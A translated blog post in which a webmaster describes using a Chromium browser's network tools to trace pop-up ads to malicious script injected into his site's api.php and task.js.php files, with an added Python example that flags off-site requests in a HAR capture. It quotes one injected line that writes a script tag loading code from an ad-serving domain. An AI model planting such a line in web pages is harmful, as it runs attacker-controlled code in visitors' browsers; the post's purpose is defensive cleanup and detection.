Using a Chromium-based browser's packet capture tool to remove malicious code

Source: Internet
Author: User
Keywords: Chromium, malicious code, packet capture

Around December last year, a friend told me that an ad popped up after he opened my site. Because malicious code had previously been inserted into one of the site's home page files, I opened the site and carefully went through the source code looking for anything suspicious, but found nothing. I asked my friend whether the ad popped up every time; he said not every time, only occasionally, so I concluded that the telecom operator was doing DNS-hijacking ads. Soon afterwards Peng Peng, from the team in Beijing, asked me why game ads sometimes popped up when he opened the home page. This time I was sure that malicious code had been planted on the site. I again carefully looked at the page source and this time finally found a clue: the malicious code did exist, not in the home page file, but in "api.php", a PHP file used for data calls in the forum on the second-level domain. The author of the malicious code had written:

document.write ("<script src=http://ad.nu99.com/ip.asp?loc=zibo></script>");

This file was then called from the main site, which loaded the code. The "zibo" at the end is the reason I never saw the ad page pop up while I was in Zibo.

In May I attended the entrepreneur conference in Beijing. Browsing the site in my hotel room, I saw ad pages popping up and hurriedly opened the source code, but saw no anomaly. At the time I meant to look into the problem carefully, but after the conference I forgot about it.

Last week, while out with a friend, I showed him my website and suddenly saw a pop-up ad. This time I was sure that malicious code had been inserted into the site and that I had to find the cause. I was too busy this week and almost forgot about it. Today the site was particularly slow, and in the morning there were frequent problems opening it, so for safety I made a temporary data backup. After the backup finished, I left a QQ message for the data center's customer service saying the site was slow to open, but got no reply. In the afternoon the site opened a little better but was still slow, and the home page still took a while to load. During the first few seconds of loading I noticed a domain name in the browser status bar: ad.df77.com. This domain looked all too familiar, just like the ad.nu99.com I had dealt with before. This time I could not let the malicious code keep running; it had to be uncovered.

process, so I went through the script code segments one by one, but in the end failed to find it. Finally I thought of the packet capture tool in Chromium-based browsers. I opened the tool and refreshed the page, and the resource list below clearly showed the source data the page had loaded from each domain:

  

In the Sources tab, the 'ip.asp?shandong|zibo' downloaded from the ad.df77.com domain once again proved that malicious code existed. I opened the Network tab, which shows all network data as it is downloaded in real time, looked down through it carefully, and finally saw the file hiding the malicious code: it was hidden in the task.js.php file:

  

I found the task.js.php file over FTP and saw that its last-modified time was December 24, 2012, which proves the malicious code had been in place for a full six months. I hurriedly downloaded the file to my local machine, saved it as a sample, and uploaded a clean task.js.php to overwrite it.
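As an added example (not code from the original post), the same network-capture check can be automated over a HAR file exported from the browser's Network panel: list every request that leaves your own domain and trace it back to the first-party file that triggered it. It assumes the capture carries Chrome's `_initiator` HAR extension field; the sample capture and the example.test site name are constructed.

```python
import json
from urllib.parse import urlsplit

# Constructed HAR fragment (not a real capture); example.test stands in for the site.
SAMPLE_HAR = json.dumps({"log": {"entries": [
    {"request": {"url": "http://www.example.test/"},
     "_initiator": {"type": "other"}},
    {"request": {"url": "http://bbs.example.test/task.js.php"},
     "_initiator": {"type": "parser", "url": "http://www.example.test/"}},
    {"request": {"url": "http://ad.df77.com/ip.asp"},
     "_initiator": {"type": "script", "stack": {"callFrames": [
         {"url": "http://bbs.example.test/task.js.php", "lineNumber": 3}]}}},
]}})

def initiator_url(entry):
    """Return the URL of the resource that triggered this request, if recorded."""
    init = entry.get("_initiator") or {}   # Chrome-specific field (assumed present)
    if init.get("url"):                    # request inserted by the HTML parser
        return init["url"]
    stack = init.get("stack") or {}
    while stack:                           # script-initiated: walk the call frames
        for frame in stack.get("callFrames", []):
            if frame.get("url"):
                return frame["url"]
        stack = stack.get("parent")        # async parent stack, if any
    return None

def find_foreign_loads(har_text, own_domain):
    """Return (foreign_host, request_url, initiator_chain) for off-site requests."""
    entries = json.loads(har_text)["log"]["entries"]
    parent = {e["request"]["url"]: initiator_url(e) for e in entries}
    findings = []
    for e in entries:
        url = e["request"]["url"]
        host = urlsplit(url).hostname or ""
        if host == own_domain or host.endswith("." + own_domain):
            continue                       # first-party request, not of interest
        chain, seen, cur = [], {url}, parent.get(url)
        while cur and cur not in seen:     # climb until the chain ends or loops
            chain.append(cur)
            seen.add(cur)
            cur = parent.get(cur)
        findings.append((host, url, chain))
    return findings

if __name__ == "__main__":
    for host, url, chain in find_foreign_loads(SAMPLE_HAR, "example.test"):
        print(host, url, "<-", " <- ".join(chain))
```

The first element of each chain is the file to inspect on the server, which in the case described here is task.js.php.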

I am also recording the following information here and ask fellow webmasters to take note of it and strengthen their defenses:

  

There are nearly hundreds of requests for help on the web about attacks from this domain name.

  

The hacker is bound to have multiple domain names on this IP, which is suspected to be used for malicious attacks.

After dealing with this, my mood was not calm; it let me once again taste the hardships of the entrepreneurial road as a grassroots webmaster. A webmaster must write code and kill Trojans, retouch pictures and edit text, do promotion and sales, and invest money in domain names and servers. When you devote all your energy to caring for the site like a baby as it slowly grows up, you also have to guard against all kinds of black hands stealing the fruits of your labor.

As the old saying goes, "surgery has a specialization". Yes, I am not a hacker and I do not know how to attack others. Perhaps, as "villains, Outsmart" says, my personal strength can never withstand hacker attacks. But I am on the road and I cannot stop.

As a small webmaster who holds a small dream at heart and does not know tiredness on the road ahead, I am not satisfied with the status quo, yet I often become complacent over a little achievement. Still, I have not forgotten Joe's teaching to us, "Stay Hungry, Stay Foolish". I quote the Moon Blog's unique understanding of this sentence as the ending:

"Although we may never be able to create anything new or perfect, we can be more stubborn and clumsy to do what we love - to be foolish and maverick, even if the world is still sophisticated, without interfering with our efforts and efforts."

This article was first published on Li Jiechun's blog: http://blog.qlzhan.com/361
